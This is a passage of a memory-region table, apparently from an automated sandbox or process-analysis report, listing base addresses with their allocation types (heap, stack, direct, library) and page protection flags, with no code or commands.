|
unkown
|
page read and write
|
||
|
27B09760000
|
heap
|
page read and write
|
||
|
7FFD9B9B4000
|
trusted library allocation
|
page read and write
|
||
|
7FF6C3671000
|
unkown
|
page execute read
|
||
|
7F040000
|
direct allocation
|
page read and write
|
||
|
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF6C36A2000
|
unkown
|
page readonly
|
||
|
1C130E20000
|
heap
|
page read and write
|
||
|
28BB000
|
heap
|
page read and write
|
||
|
48EE000
|
stack
|
page read and write
|
||
|
2298000
|
direct allocation
|
page read and write
|
||
|
6F7000
|
heap
|
page read and write
|
||
|
20E1BFB0000
|
heap
|
page read and write
|
||
|
15701000
|
heap
|
page read and write
|
||
|
2CA0000
|
heap
|
page read and write
|
||
|
27B094B0000
|
heap
|
page read and write
|
||
|
2389000
|
direct allocation
|
page read and write
|
||
|
7FF6C36CD000
|
unkown
|
page readonly
|
||
|
29EDFA00000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
25C0000
|
heap
|
page read and write
|
||
|
851000
|
heap
|
page read and write
|
||
|
4FB0000
|
heap
|
page read and write
|
||
|
5ED4BFF000
|
stack
|
page read and write
|
||
|
1F1B0DCB000
|
heap
|
page read and write
|
||
|
26570180000
|
heap
|
page read and write
|
||
|
27B09513000
|
heap
|
page read and write
|
||
|
29FA000
|
direct allocation
|
page read and write
|
||
|
20B19945000
|
heap
|
page read and write
|
||
|
7FF6C36AD000
|
unkown
|
page read and write
|
||
|
23FE09D4000
|
heap
|
page read and write
|
||
|
77CBAFF000
|
stack
|
page read and write
|
||
|
7FF6C3670000
|
unkown
|
page readonly
|
||
|
7FF6C36CD000
|
unkown
|
page readonly
|
||
|
20B1961F000
|
heap
|
page read and write
|
||
|
F1CADFF000
|
stack
|
page read and write
|
||
|
FE0ABFE000
|
stack
|
page read and write
|
||
|
7EE00000
|
direct allocation
|
page read and write
|
||
|
152718D4000
|
heap
|
page read and write
|
||
|
2D1E000
|
stack
|
page read and write
|
||
|
23FE09B0000
|
heap
|
page read and write
|
||
|
7EFB0000
|
direct allocation
|
page read and write
|
||
|
7EF70000
|
direct allocation
|
page read and write
|
||
|
26E4ED10000
|
heap
|
page read and write
|
||
|
A94D4BB000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
3030000
|
heap
|
page read and write
|
||
|
1561E000
|
stack
|
page read and write
|
||
|
27B09513000
|
heap
|
page read and write
|
||
|
1C132FA2000
|
heap
|
page read and write
|
||
|
21B0000
|
direct allocation
|
page execute and read and write
|
||
|
7FF6C36CC000
|
unkown
|
page write copy
|
||
|
1F1C2B41000
|
trusted library allocation
|
page read and write
|
||
|
15EBA000
|
heap
|
page read and write
|
||
|
7FF6C36B1000
|
unkown
|
page read and write
|
||
|
33CE000
|
stack
|
page read and write
|
||
|
27B09513000
|
heap
|
page read and write
|
||
|
2C7E000
|
stack
|
page read and write
|
||
|
647000
|
heap
|
page read and write
|
||
|
4F6E000
|
stack
|
page read and write
|
||
|
2657006B000
|
heap
|
page read and write
|
||
|
1F1B2760000
|
trusted library allocation
|
page read and write
|
||
|
15DA4000
|
heap
|
page read and write
|
||
|
1E65F000
|
stack
|
page read and write
|
||
|
7F000000
|
direct allocation
|
page read and write
|
||
|
7FF7E1A75000
|
unkown
|
page write copy
|
||
|
1F1B0E28000
|
heap
|
page read and write
|
||
|
248FE090000
|
heap
|
page read and write
|
||
|
20B19618000
|
heap
|
page read and write
|
||
|
4D4000
|
unkown
|
page readonly
|
||
|
21A428C9000
|
heap
|
page read and write
|
||
|
1F400D40000
|
heap
|
page read and write
|
||
|
56D67C000
|
stack
|
page read and write
|
||
|
20B19570000
|
heap
|
page read and write
|
||
|
2AF987F0000
|
heap
|
page read and write
|
||
|
7F000000
|
direct allocation
|
page read and write
|
||
|
27B09515000
|
heap
|
page read and write
|
||
|
1F1B0EA0000
|
heap
|
page read and write
|
||
|
7FF6C36CC000
|
unkown
|
page write copy
|
||
|
26E4ECC0000
|
heap
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
288F000
|
heap
|
page read and write
|
||
|
7F4B0000
|
direct allocation
|
page read and write
|
||
|
7FF7E18E0000
|
unkown
|
page readonly
|
||
|
61E000
|
stack
|
page read and write
|
||
|
2AF98710000
|
heap
|
page read and write
|
||
|
15870000
|
remote allocation
|
page read and write
|
||
|
20D69924000
|
heap
|
page read and write
|
||
|
8A8000
|
heap
|
page read and write
|
||
|
7FF6C36A2000
|
unkown
|
page readonly
|
||
|
2AF988C2000
|
heap
|
page read and write
|
||
|
2AAC000
|
stack
|
page read and write
|
||
|
2180000
|
heap
|
page read and write
|
||
|
29EDFC90000
|
heap
|
page read and write
|
||
|
27B09516000
|
heap
|
page read and write
|
||
|
7FF6C36C9000
|
unkown
|
page readonly
|
||
|
1F400DCC000
|
heap
|
page read and write
|
||
|
7FF6C36B1000
|
unkown
|
page read and write
|
||
|
7FF6C36B1000
|
unkown
|
page read and write
|
||
|
29CF000
|
direct allocation
|
page read and write
|
||
|
7EB10000
|
direct allocation
|
page read and write
|
||
|
1F1C2CF5000
|
trusted library allocation
|
page read and write
|
||
|
27B09516000
|
heap
|
page read and write
|
||
|
5BE32FF000
|
stack
|
page read and write
|
||
|
29EDFC80000
|
heap
|
page read and write
|
||
|
272E000
|
stack
|
page read and write
|
||
|
1F1B2700000
|
heap
|
page execute and read and write
|
||
|
800000
|
heap
|
page read and write
|
||
|
7FF6C36C9000
|
unkown
|
page readonly
|
||
|
7C0000
|
heap
|
page read and write
|
||
|
7FF6C3670000
|
unkown
|
page readonly
|
||
|
159C0000
|
heap
|
page read and write
|
||
|
7F550000
|
direct allocation
|
page read and write
|
||
|
7FF6C36AD000
|
unkown
|
page read and write
|
||
|
2C30000
|
heap
|
page read and write
|
||
|
1CD34954000
|
heap
|
page read and write
|
||
|
2274000
|
direct allocation
|
page read and write
|
||
|
226D000
|
direct allocation
|
page read and write
|
||
|
7FF7E1A5A000
|
unkown
|
page write copy
|
||
|
155CD000
|
stack
|
page read and write
|
||
|
7FF6C3670000
|
unkown
|
page readonly
|
||
|
613C5000
|
unkown
|
page readonly
|
||
|
7FF6C36C9000
|
unkown
|
page readonly
|
||
|
5380000
|
heap
|
page read and write
|
||
|
248FE070000
|
heap
|
page read and write
|
||
|
20E1BFA5000
|
heap
|
page read and write
|
||
|
227C000
|
direct allocation
|
page read and write
|
||
|
2763000
|
heap
|
page read and write
|
||
|
40F4000
|
direct allocation
|
page read and write
|
||
|
56DAFE000
|
stack
|
page read and write
|
||
|
1F1CADA6000
|
heap
|
page read and write
|
||
|
7FF6C36B5000
|
unkown
|
page read and write
|
||
|
1538E000
|
stack
|
page read and write
|
||
|
7F410000
|
direct allocation
|
page read and write
|
||
|
235F5787000
|
heap
|
page read and write
|
||
|
27B09516000
|
heap
|
page read and write
|
||
|
868000
|
heap
|
page read and write
|
||
|
1F402BC0000
|
trusted library allocation
|
page read and write
|
||
|
56D57E000
|
stack
|
page read and write
|
||
|
3D134E000
|
stack
|
page read and write
|
||
|
27B09514000
|
heap
|
page read and write
|
||
|
235F5785000
|
heap
|
page read and write
|
||
|
1C132BC3000
|
heap
|
page read and write
|
||
|
7F390000
|
direct allocation
|
page read and write
|
||
|
7FF6C36BF000
|
unkown
|
page read and write
|
||
|
1D6D1070000
|
heap
|
page read and write
|
||
|
2D3A000
|
heap
|
page read and write
|
||
|
26E4EBDF000
|
heap
|
page read and write
|
||
|
2D51000
|
heap
|
page read and write
|
||
|
2983000
|
direct allocation
|
page read and write
|
||
|
405C000
|
direct allocation
|
page read and write
|
||
|
2974000
|
direct allocation
|
page read and write
|
||
|
7FF6C3671000
|
unkown
|
page execute read
|
||
|
155EE000
|
stack
|
page read and write
|
||
|
20B1965D000
|
heap
|
page read and write
|
||
|
56D7FE000
|
stack
|
page read and write
|
||
|
20B1962B000
|
heap
|
page read and write
|
||
|
1F1B0D72000
|
heap
|
page read and write
|
||
|
7FF6C36C9000
|
unkown
|
page readonly
|
||
|
7FF6C3671000
|
unkown
|
page execute read
|
||
|
3190000
|
heap
|
page read and write
|
||
|
1CD34749000
|
heap
|
page read and write
|
||
|
29DD000
|
direct allocation
|
page read and write
|
||
|
1F1B0C80000
|
heap
|
page read and write
|
||
|
7FF6C36C4000
|
unkown
|
page read and write
|
||
|
650000
|
heap
|
page read and write
|
||
|
640000
|
heap
|
page read and write
|
||
|
27B094C0000
|
heap
|
page read and write
|
||
|
3D12CC000
|
stack
|
page read and write
|
||
|
246EE9B4000
|
heap
|
page read and write
|
||
|
7FF6C36C9000
|
unkown
|
page readonly
|
||
|
2C5E000
|
stack
|
page read and write
|
||
|
20B19655000
|
heap
|
page read and write
|
||
|
848000
|
heap
|
page read and write
|
||
|
2674000
|
direct allocation
|
page read and write
|
||
|
2F0E000
|
stack
|
page read and write
|
||
|
20E1C04B000
|
heap
|
page read and write
|
||
|
C80038C000
|
stack
|
page read and write
|
||
|
235F5787000
|
heap
|
page read and write
|
||
|
239D000
|
stack
|
page read and write
|
||
|
2DBD000
|
stack
|
page read and write
|
||
|
15820000
|
trusted library allocation
|
page read and write
|
||
|
5F90000
|
heap
|
page read and write
|
||
|
7FF6C36B9000
|
unkown
|
page read and write
|
||
|
CCEE4FC000
|
stack
|
page read and write
|
||
|
7EFB0000
|
direct allocation
|
page read and write
|
||
|
56D4FE000
|
stack
|
page read and write
|
||
|
285B000
|
direct allocation
|
page read and write
|
||
|
848000
|
heap
|
page read and write
|
||
|
56E64E000
|
stack
|
page read and write
|
||
|
156EF000
|
stack
|
page read and write
|
||
|
5ED4AFC000
|
stack
|
page read and write
|
||
|
26E4EBA8000
|
heap
|
page read and write
|
||
|
2B9F000
|
stack
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
29E5000
|
heap
|
page read and write
|
||
|
7FF6C36CC000
|
unkown
|
page write copy
|
||
|
1D6D0E10000
|
heap
|
page read and write
|
||
|
235F5787000
|
heap
|
page read and write
|
||
|
1F400D95000
|
heap
|
page read and write
|
||
|
317E000
|
unkown
|
page read and write
|
||
|
2954000
|
direct allocation
|
page read and write
|
||
|
271E31E0000
|
heap
|
page read and write
|
||
|
2291000
|
direct allocation
|
page read and write
|
||
|
26F69A0C000
|
heap
|
page read and write
|
||
|
7FF6C3671000
|
unkown
|
page execute read
|
||
|
1F400D9C000
|
heap
|
page read and write
|
||
|
7FF6C36AD000
|
unkown
|
page read and write
|
||
|
1F1CAE90000
|
heap
|
page read and write
|
||
|
41956FD000
|
stack
|
page read and write
|
||
|
29EDFA0B000
|
heap
|
page read and write
|
||
|
27B09513000
|
heap
|
page read and write
|
||
|
26570060000
|
heap
|
page read and write
|
||
|
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
|
99F000
|
stack
|
page read and write
|
||
|
56D8F7000
|
stack
|
page read and write
|
||
|
26570045000
|
heap
|
page read and write
|
||
|
2910000
|
heap
|
page read and write
|
||
|
7FF6C36CC000
|
unkown
|
page write copy
|
||
|
1F400D98000
|
heap
|
page read and write
|
||
|
1F1B3772000
|
trusted library allocation
|
page read and write
|
||
|
B1DDBFE000
|
stack
|
page read and write
|
||
|
7FF6C36AD000
|
unkown
|
page write copy
|
||
|
1F400D80000
|
heap
|
page read and write
|
||
|
34B8000
|
heap
|
page read and write
|
||
|
2CFE000
|
stack
|
page read and write
|
||
|
15A28BD000
|
stack
|
page read and write
|
||
|
F6434FE000
|
stack
|
page read and write
|
||
|
29EDFA27000
|
heap
|
page read and write
|
||
|
7FF7E1A6D000
|
unkown
|
page readonly
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
401C000
|
direct allocation
|
page read and write
|
||
|
7FF6C36B1000
|
unkown
|
page read and write
|
||
|
F6432FB000
|
stack
|
page read and write
|
||
|
1F1B26A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF6C3670000
|
unkown
|
page readonly
|
||
|
1CD34700000
|
heap
|
page read and write
|
||
|
7FF6C36C4000
|
unkown
|
page read and write
|
||
|
9B5AF7F000
|
stack
|
page read and write
|
||
|
26570040000
|
heap
|
page read and write
|
||
|
7F000000
|
direct allocation
|
page read and write
|
||
|
7FF738F6D000
|
unkown
|
page readonly
|
||
|
2C1E000
|
unkown
|
page read and write
|
||
|
B20737D000
|
stack
|
page read and write
|
||
|
23FE08B5000
|
heap
|
page read and write
|
||
|
15F97000
|
direct allocation
|
page read and write
|
||
|
1F1B0E90000
|
heap
|
page read and write
|
||
|
1F1B4508000
|
trusted library allocation
|
page read and write
|
||
|
3056000
|
heap
|
page read and write
|
||
|
248FE364000
|
heap
|
page read and write
|
||
|
25F0000
|
heap
|
page read and write
|
||
|
241E000
|
stack
|
page read and write
|
||
|
7F730000
|
direct allocation
|
page read and write
|
||
|
7F6BF000
|
direct allocation
|
page read and write
|
||
|
27B094EE000
|
heap
|
page read and write
|
||
|
20D6962C000
|
heap
|
page read and write
|
||
|
33A6000
|
heap
|
page read and write
|
||
|
4CD000
|
unkown
|
page read and write
|
||
|
3587000
|
heap
|
page read and write
|
||
|
7EC70000
|
direct allocation
|
page read and write
|
||
|
1574E000
|
stack
|
page read and write
|
||
|
88D000
|
heap
|
page read and write
|
||
|
7EFFF000
|
direct allocation
|
page read and write
|
||
|
7FF6C36AD000
|
unkown
|
page write copy
|
||
|
6820000
|
heap
|
page read and write
|
||
|
20B1994C000
|
heap
|
page read and write
|
||
|
14C571E7000
|
heap
|
page read and write
|
||
|
2760000
|
heap
|
page read and write
|
||
|
1E90D000
|
stack
|
page read and write
|
||
|
296D000
|
direct allocation
|
page read and write
|
||
|
26F6B380000
|
heap
|
page read and write
|
||
|
2D80000
|
heap
|
page read and write
|
||
|
20B19890000
|
heap
|
page read and write
|
||
|
2998000
|
direct allocation
|
page read and write
|
||
|
7FF6C36C9000
|
unkown
|
page readonly
|
||
|
FCD6DFE000
|
stack
|
page read and write
|
||
|
27B097CC000
|
heap
|
page read and write
|
||
|
270E000
|
unkown
|
page read and write
|
||
|
97000
|
stack
|
page read and write
|
||
|
6020000
|
trusted library allocation
|
page read and write
|
||
|
15870000
|
remote allocation
|
page read and write
|
||
|
7FF6C36CC000
|
unkown
|
page write copy
|
||
|
7FF6C36AD000
|
unkown
|
page write copy
|
||
|
20B19627000
|
heap
|
page read and write
|
||
|
7FF6C36B1000
|
unkown
|
page read and write
|
||
|
20E1C140000
|
heap
|
page read and write
|
||
|
235F56E0000
|
heap
|
page read and write
|
||
|
29EDF950000
|
heap
|
page read and write
|
||
|
7FF6C3670000
|
unkown
|
page readonly
|
||
|
27B09516000
|
heap
|
page read and write
|
||
|
97000
|
stack
|
page read and write
|
||
|
7FF7E18E1000
|
unkown
|
page execute read
|
||
|
7FF6C36CD000
|
unkown
|
page readonly
|
||
|
31AE000
|
heap
|
page read and write
|
||
|
33EF000
|
stack
|
page read and write
|
||
|
2966000
|
direct allocation
|
page read and write
|
||
|
45F000
|
unkown
|
page write copy
|
||
|
2AF98B55000
|
heap
|
page read and write
|
||
|
7C86BCE000
|
stack
|
page read and write
|
||
|
26F699A5000
|
heap
|
page read and write
|
||
|
1F402650000
|
heap
|
page read and write
|
||
|
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF6C36B9000
|
unkown
|
page read and write
|
||
|
27B094EC000
|
heap
|
page read and write
|
||
|
1E44F000
|
stack
|
page read and write
|
||
|
34B0000
|
heap
|
page read and write
|
||
|
2879000
|
heap
|
page read and write
|
||
|
7EFFF000
|
direct allocation
|
page read and write
|
||
|
7ED70000
|
direct allocation
|
page read and write
|
||
|
7FF6C36CC000
|
unkown
|
page write copy
|
||
|
7FF7E18E0000
|
unkown
|
page readonly
|
||
|
23FE08A2000
|
heap
|
page read and write
|
||
|
2390000
|
direct allocation
|
page read and write
|
||
|
20B1BE20000
|
heap
|
page read and write
|
||
|
1F400DC3000
|
heap
|
page read and write
|
||
|
1F4033C0000
|
heap
|
page read and write
|
||
|
1CD34727000
|
heap
|
page read and write
|
||
|
1F1B2BCB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9B2000
|
trusted library allocation
|
page read and write
|
||
|
158BE000
|
stack
|
page read and write
|
||
|
1C132D0C000
|
heap
|
page read and write
|
||
|
7FF6C36A2000
|
unkown
|
page readonly
|
||
|
882000
|
heap
|
page read and write
|
||
|
1F1CAE61000
|
heap
|
page read and write
|
||
|
2FD5000
|
stack
|
page read and write
|
||
|
2E30000
|
heap
|
page read and write
|
||
|
7FF6C3670000
|
unkown
|
page readonly
|
||
|
808000
|
heap
|
page read and write
|
||
|
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
|
26F699FA000
|
heap
|
page read and write
|
||
|
45F000
|
unkown
|
page read and write
|
||
|
20D69920000
|
heap
|
page read and write
|
||
|
26F69950000
|
heap
|
page read and write
|
||
|
7FF6C3671000
|
unkown
|
page execute read
|
||
|
7FF6C3671000
|
unkown
|
page execute read
|
||
|
1546F000
|
stack
|
page read and write
|
||
|
15271750000
|
heap
|
page read and write
|
||
|
7F5A0000
|
direct allocation
|
page read and write
|
||
|
7F4000
|
heap
|
page read and write
|
||
|
261A000
|
direct allocation
|
page read and write
|
||
|
1CD34955000
|
heap
|
page read and write
|
||
|
27B09512000
|
heap
|
page read and write
|
||
|
235F56B5000
|
heap
|
page read and write
|
||
|
228A000
|
direct allocation
|
page read and write
|
||
|
7FF6C36A2000
|
unkown
|
page readonly
|
||
|
15A56000
|
heap
|
page read and write
|
||
|
7FF7E1A78000
|
unkown
|
page readonly
|
||
|
7FF6C36C9000
|
unkown
|
page readonly
|
||
|
7FF6C3670000
|
unkown
|
page readonly
|
||
|
56D6FE000
|
stack
|
page read and write
|
||
|
7FF6C36C9000
|
unkown
|
page readonly
|
||
|
339E000
|
stack
|
page read and write
|
||
|
7FF622766000
|
unkown
|
page write copy
|
||
|
6F9000
|
heap
|
page read and write
|
||
|
7F730000
|
direct allocation
|
page read and write
|
||
|
19D000
|
stack
|
page read and write
|
||
|
56D977000
|
stack
|
page read and write
|
||
|
20D695A0000
|
heap
|
page read and write
|
||
|
26F699FA000
|
heap
|
page read and write
|
||
|
19D000
|
stack
|
page read and write
|
||
|
15C71000
|
heap
|
page read and write
|
||
|
7FF7E19FE000
|
unkown
|
page readonly
|
||
|
820000
|
heap
|
page read and write
|
||
|
7FF6C36C9000
|
unkown
|
page readonly
|
||
|
20E1BFD0000
|
heap
|
page read and write
|
||
|
1F1B2720000
|
heap
|
page read and write
|
||
|
2E0B000
|
heap
|
page read and write
|
||
|
7FF6C36BF000
|
unkown
|
page read and write
|
||
|
7FF6C36B5000
|
unkown
|
page read and write
|
||
|
6850000
|
heap
|
page read and write
|
||
|
9B5AB2D000
|
stack
|
page read and write
|
||
|
26F699F6000
|
heap
|
page read and write
|
||
|
7FF6C3671000
|
unkown
|
page execute read
|
||
|
7FF7E18E0000
|
unkown
|
page readonly
|
||
|
7FF6C36CC000
|
unkown
|
page write copy
|
||
|
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
|
7FF6C36A2000
|
unkown
|
page readonly
|
||
|
23CA000
|
direct allocation
|
page read and write
|
||
|
1F1CAE58000
|
heap
|
page read and write
|
||
|
7F640000
|
direct allocation
|
page read and write
|
||
|
26F69A2B000
|
heap
|
page read and write
|
||
|
1F1B4394000
|
trusted library allocation
|
page read and write
|
||
|
44E4000
|
heap
|
page read and write
|
||
|
20E1BEB0000
|
heap
|
page read and write
|
||
|
2290000
|
heap
|
page read and write
|
||
|
2FCE000
|
stack
|
page read and write
|
||
|
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
|
B2073FE000
|
stack
|
page read and write
|
||
|
2E47000
|
heap
|
page read and write
|
||
|
1F1CB167000
|
heap
|
page read and write
|
||
|
7ED50000
|
direct allocation
|
page read and write
|
||
|
27B09516000
|
heap
|
page read and write
|
||
|
800000
|
heap
|
page read and write
|
||
|
1F1B26C0000
|
trusted library allocation
|
page read and write
|
||
|
27B09513000
|
heap
|
page read and write
|
||
|
2900000
|
direct allocation
|
page read and write
|
||
|
1F1CB150000
|
heap
|
page read and write
|
||
|
15EB0000
|
heap
|
page read and write
|
||
|
7FF6C36A2000
|
unkown
|
page readonly
|
||
|
1D6D0ECE000
|
heap
|
page read and write
|
||
|
7EE6F000
|
direct allocation
|
page read and write
|
||
|
56D77E000
|
stack
|
page read and write
|
||
|
7FF6C36A2000
|
unkown
|
page readonly
|
||
|
15B6E000
|
heap
|
page read and write
|
||
|
5ED4CFF000
|
stack
|
page read and write
|
||
|
20B1965D000
|
heap
|
page read and write
|
||
|
27B09516000
|
heap
|
page read and write
|
||
|
1F1CAB4F000
|
heap
|
page read and write
|
||
|
23F0000
|
heap
|
page read and write
|
||
|
2D3D000
|
heap
|
page read and write
|
||
|
3FEC000
|
direct allocation
|
page read and write
|
||
|
248FDF90000
|
heap
|
page read and write
|
||
|
2D4E000
|
stack
|
page read and write
|
||
|
154AE000
|
stack
|
page read and write
|
||
|
810000
|
direct allocation
|
page execute and read and write
|
||
|
20B19580000
|
heap
|
page read and write
|
||
|
1F402680000
|
heap
|
page read and write
|
||
|
7FF6C36AD000
|
unkown
|
page read and write
|
||
|
287E000
|
heap
|
page read and write
|
||
|
7FF6C3671000
|
unkown
|
page execute read
|
||
|
2170000
|
heap
|
page read and write
|
||
|
26F69960000
|
heap
|
page read and write
|
||
|
20B1965D000
|
heap
|
page read and write
|
||
|
27B09513000
|
heap
|
page read and write
|
||
|
15271730000
|
heap
|
page read and write
|
||
|
7FF6C36A2000
|
unkown
|
page readonly
|
||
|
20B19655000
|
heap
|
page read and write
|
||
|
20B19659000
|
heap
|
page read and write
|
||
|
7FF6C36AD000
|
unkown
|
page read and write
|
||
|
489A4FD000
|
stack
|
page read and write
|
||
|
7FFD9BCD0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7E1A78000
|
unkown
|
page readonly
|
||
|
1D6D1060000
|
heap
|
page read and write
|
||
|
15CF0000
|
heap
|
page read and write
|
||
|
20D69570000
|
heap
|
page read and write
|
||
|
7ECF0000
|
direct allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
7FF6C36C9000
|
unkown
|
page readonly
|
||
|
7FF7E19FE000
|
unkown
|
page readonly
|
||
|
7FF6C36A2000
|
unkown
|
page readonly
|
||
|
86E000
|
heap
|
page read and write
|
||
|
274E000
|
stack
|
page read and write
|
||
|
27B09515000
|
heap
|
page read and write
|
||
|
89E000
|
heap
|
page read and write
|
||
|
2AF98810000
|
heap
|
page read and write
|
||
|
23FE089B000
|
heap
|
page read and write
|
||
|
7EF20000
|
direct allocation
|
page read and write
|
||
|
4CB000
|
unkown
|
page read and write
|
||
|
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
|
246EE9B5000
|
heap
|
page read and write
|
||
|
2283000
|
direct allocation
|
page read and write
|
||
|
478000
|
direct allocation
|
page execute and read and write
|
||
|
8A4000
|
heap
|
page read and write
|
||
|
7FE000
|
heap
|
page read and write
|
||
|
2844000
|
heap
|
page read and write
|
||
|
7FF6C36C9000
|
unkown
|
page readonly
|
||
|
3556000
|
heap
|
page read and write
|
||
|
14C571C4000
|
heap
|
page read and write
|
||
|
2190000
|
heap
|
page read and write
|
||
|
20D69580000
|
heap
|
page read and write
|
||
|
29EDFC85000
|
heap
|
page read and write
|
||
|
7F6FF000
|
direct allocation
|
page read and write
|
||
|
28FE000
|
stack
|
page read and write
|
||
|
27B09516000
|
heap
|
page read and write
|
||
|
7FF6C36C9000
|
unkown
|
page readonly
|
||
|
246EE5B0000
|
heap
|
page read and write
|
||
|
300F000
|
stack
|
page read and write
|
||
|
285A000
|
heap
|
page read and write
|
||
|
21A42B86000
|
heap
|
page read and write
|
||
|
2E38000
|
heap
|
page read and write
|
||
|
31A6000
|
heap
|
page read and write
|
||
|
A94D5BE000
|
stack
|
page read and write
|
||
|
406D000
|
direct allocation
|
page read and write
|
||
|
27B09512000
|
heap
|
page read and write
|
||
|
7FD10000
|
direct allocation
|
page read and write
|
||
|
271E31C4000
|
heap
|
page read and write
|
||
|
2AF98B50000
|
heap
|
page read and write
|
||
|
7F020000
|
direct allocation
|
page read and write
|
||
|
7FF6C36A2000
|
unkown
|
page readonly
|
||
|
1F400D3C000
|
heap
|
page read and write
|
||
|
4F20000
|
heap
|
page read and write
|
||
|
271E3203000
|
heap
|
page read and write
|
||
|
2D00000
|
heap
|
page read and write
|
||
|
235F56C0000
|
heap
|
page read and write
|
||
|
7FF6C3670000
|
unkown
|
page readonly
|
||
|
21A42AB3000
|
heap
|
page read and write
|
||
|
26F69A07000
|
heap
|
page read and write
|
||
|
21A42AB0000
|
heap
|
page read and write
|
||
|
2906000
|
direct allocation
|
page read and write
|
||
|
20B19659000
|
heap
|
page read and write
|
||
|
7FF7E1A63000
|
unkown
|
page read and write
|
||
|
266D000
|
direct allocation
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
1548F000
|
stack
|
page read and write
|
||
|
1F400DAD000
|
heap
|
page read and write
|
||
|
1F400DC8000
|
heap
|
page read and write
|
||
|
2642000
|
direct allocation
|
page read and write
|
||
|
1F1B2D72000
|
trusted library allocation
|
page read and write
|
||
|
56DA7E000
|
stack
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
7FF6C36C9000
|
unkown
|
page readonly
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
31A0000
|
heap
|
page read and write
|
||
|
2C2D000
|
stack
|
page read and write
|
||
|
271E3190000
|
heap
|
page read and write
|
||
|
2249000
|
direct allocation
|
page read and write
|
||
|
7FF6C36AD000
|
unkown
|
page write copy
|
||
|
2683000
|
direct allocation
|
page read and write
|
||
|
2AF988AE000
|
heap
|
page read and write
|
||
|
7FF6C3671000
|
unkown
|
page execute read
|
||
|
256D000
|
stack
|
page read and write
|
||
|
4854000
|
heap
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
|
271E31E7000
|
heap
|
page read and write
|
||
|
295F000
|
direct allocation
|
page read and write
|
||
|
2E47000
|
heap
|
page read and write
|
||
|
7FF7E19FE000
|
unkown
|
page readonly
|
||
|
2D51000
|
heap
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
478000
|
direct allocation
|
page execute and read and write
|
||
|
7FF7E18E0000
|
unkown
|
page readonly
|
||
|
246EE9B0000
|
heap
|
page read and write
|
||
|
21A42B84000
|
heap
|
page read and write
|
||
|
248FE365000
|
heap
|
page read and write
|
||
|
7FF6C36A2000
|
unkown
|
page readonly
|
||
|
296A000
|
direct allocation
|
page read and write
|
||
|
23FE08B5000
|
heap
|
page read and write
|
||
|
F1CACFC000
|
stack
|
page read and write
|
||
|
1D6D0EE2000
|
heap
|
page read and write
|
||
|
7FF6C36AD000
|
unkown
|
page write copy
|
||
|
26F69A27000
|
heap
|
page read and write
|
||
|
7FF6C36CC000
|
unkown
|
page write copy
|
||
|
1F1B0D60000
|
heap
|
page read and write
|
||
|
7FF6C36B1000
|
unkown
|
page read and write
|
||
|
7FF6C3671000
|
unkown
|
page execute read
|
||
|
21A428A0000
|
heap
|
page read and write
|
||
|
25E0000
|
heap
|
page read and write
|
||
|
7FF622751000
|
unkown
|
page execute read
|
||
|
7FF6C36CD000
|
unkown
|
page readonly
|
||
|
287B000
|
heap
|
page read and write
|
||
|
248FE370000
|
heap
|
page read and write
|
||
|
7EFF0000
|
direct allocation
|
page read and write
|
||
|
20B1963D000
|
heap
|
page read and write
|
||
|
15703000
|
heap
|
page read and write
|
||
|
9B5AE7E000
|
stack
|
page read and write
|
||
|
2750000
|
heap
|
page read and write
|
||
|
20B19659000
|
heap
|
page read and write
|
||
|
235F5787000
|
heap
|
page read and write
|
||
|
2BBE000
|
stack
|
page read and write
|
||
|
7FF7E18E1000
|
unkown
|
page execute read
|
||
|
159BF000
|
stack
|
page read and write
|
||
|
7CB000
|
heap
|
page read and write
|
||
|
7FF6C36BF000
|
unkown
|
page read and write
|
||
|
474000
|
direct allocation
|
page execute and read and write
|
||
|
1D6D1065000
|
heap
|
page read and write
|
||
|
1F400DCC000
|
heap
|
page read and write
|
||
|
2B10000
|
heap
|
page read and write
|
||
|
1F400DC8000
|
heap
|
page read and write
|
||
|
1C130EA0000
|
heap
|
page read and write
|
||
|
1F1CAE04000
|
heap
|
page read and write
|
||
|
1F1B0D9E000
|
heap
|
page read and write
|
||
|
2D67000
|
heap
|
page read and write
|
||
|
7FF6C3670000
|
unkown
|
page readonly
|
||
|
155AE000
|
stack
|
page read and write
|
||
|
7FF6C36A2000
|
unkown
|
page readonly
|
||
|
7FF6C3671000
|
unkown
|
page execute read
|
||
|
2820000
|
heap
|
page read and write
|
||
|
235F5760000
|
heap
|
page read and write
|
||
|
7F3F0000
|
direct allocation
|
page read and write
|
||
|
E54E48B000
|
stack
|
page read and write
|
||
|
2D6E000
|
heap
|
page read and write
|
||
|
842000
|
heap
|
page read and write
|
||
|
77CBBFF000
|
stack
|
page read and write
|
||
|
4184000
|
direct allocation
|
page read and write
|
||
|
7FF6C3670000
|
unkown
|
page readonly
|
||
|
1CF2DFE000
|
stack
|
page read and write
|
||
|
7FF6C36A2000
|
unkown
|
page readonly
|
||
|
2AAF000
|
stack
|
page read and write
|
||
|
1C130ED0000
|
heap
|
page read and write
|
||
|
1F400DCC000
|
heap
|
page read and write
|
||
|
7EFA0000
|
direct allocation
|
page read and write
|
||
|
7FDE0000
|
direct allocation
|
page read and write
|
||
|
27B09513000
|
heap
|
page read and write
|
